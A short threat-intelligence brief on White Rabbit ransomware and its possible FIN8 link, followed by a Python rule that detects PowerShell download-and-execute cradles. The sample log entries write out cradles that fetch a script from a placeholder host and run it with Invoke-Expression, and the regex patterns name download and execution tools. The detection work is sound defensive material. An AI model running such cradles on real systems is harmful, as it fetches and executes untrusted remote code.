January 25, 2022

FIN8 Connection to White Rabbit Ransomware

Industry: N/A | Level: Tactical | Source: TrendMicro

New ransomware, White Rabbit, was identified in an attack against a US bank in December 2021. Given the infrastructure and tooling used, it is potentially associated with the FIN8 threat group. Details of the attack chain are currently limited: the only step identified so far is a PowerShell download delivered through Cobalt Strike, shared from TrendMicro’s observed telemetry. The White Rabbit payload was also found to have a distinctive trait that it shares with Egregor ransomware. As TrendMicro describes it, “One of the most notable aspects of White Rabbit’s attack is how its payload binary requires a specific command-line password to decrypt its internal configuration and proceed with its ransomware routine. This method of hiding malicious activity is a trick that the ransomware family Egregor uses to hide malware techniques from analysis.” Current observations find White Rabbit’s targets to be few, and the malware is likely still being tested by the threat actors.

  • Anvilogic Use Cases:
    • Invoke-Expression Command
    • Invoke-WebRequest Command
    • Cobalt Strike Beacon
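A minimal detection for the Invoke-WebRequest / Invoke-Expression download cradle that the first two use cases above cover, written here as an added example rather than TrendMicro's or Anvilogic's own logic. The script-block log entries, host names and `placeholder.invalid` URLs are constructed; real deployments would read the script text from PowerShell script-block logging (Event ID 4104).

```python
import re

# Constructed sample script-block log entries (Event ID 4104 style), not from
# the TrendMicro report. Only the "script" field is inspected.
SAMPLE_EVENTS = [
    {"host": "wks-01", "script": "Get-ChildItem C:\\Users | Measure-Object"},
    {"host": "wks-02", "script": "Invoke-WebRequest -Uri http://placeholder.invalid/a.ps1 "
                                 "-OutFile a.ps1; Invoke-Expression (Get-Content a.ps1 -Raw)"},
    {"host": "wks-03", "script": "iex (iwr http://placeholder.invalid/b -UseBasicParsing).Content"},
    {"host": "wks-04", "script": "Invoke-WebRequest https://placeholder.invalid/list.json -OutFile list.json"},
]

# Cmdlet names plus their built-in Windows PowerShell aliases (iwr, curl, wget
# for Invoke-WebRequest; iex for Invoke-Expression). PowerShell is
# case-insensitive, so the match is too. "curl"/"wget" will also hit the
# native binaries, which is acceptable for a broad first-pass rule.
DOWNLOAD = re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget)\b", re.I)
EXECUTE = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)


def classify(script: str) -> str:
    """Label one script block: download_and_execute, download, execute, or none."""
    has_dl = DOWNLOAD.search(script) is not None
    has_ex = EXECUTE.search(script) is not None
    if has_dl and has_ex:
        return "download_and_execute"
    if has_dl:
        return "download"
    if has_ex:
        return "execute"
    return "none"


def find_download_cradles(events):
    """Return the hosts whose single script block both fetches and executes content."""
    return [e["host"] for e in events if classify(e["script"]) == "download_and_execute"]


if __name__ == "__main__":
    for host in find_download_cradles(SAMPLE_EVENTS):
        print(f"download-and-execute cradle on {host}")
```

The rule only fires when both cmdlets appear in the same script block; splitting the download and the execution across separate events, or a download alone (wks-04), is left for a correlation rule or the separate Invoke-WebRequest use case to catch.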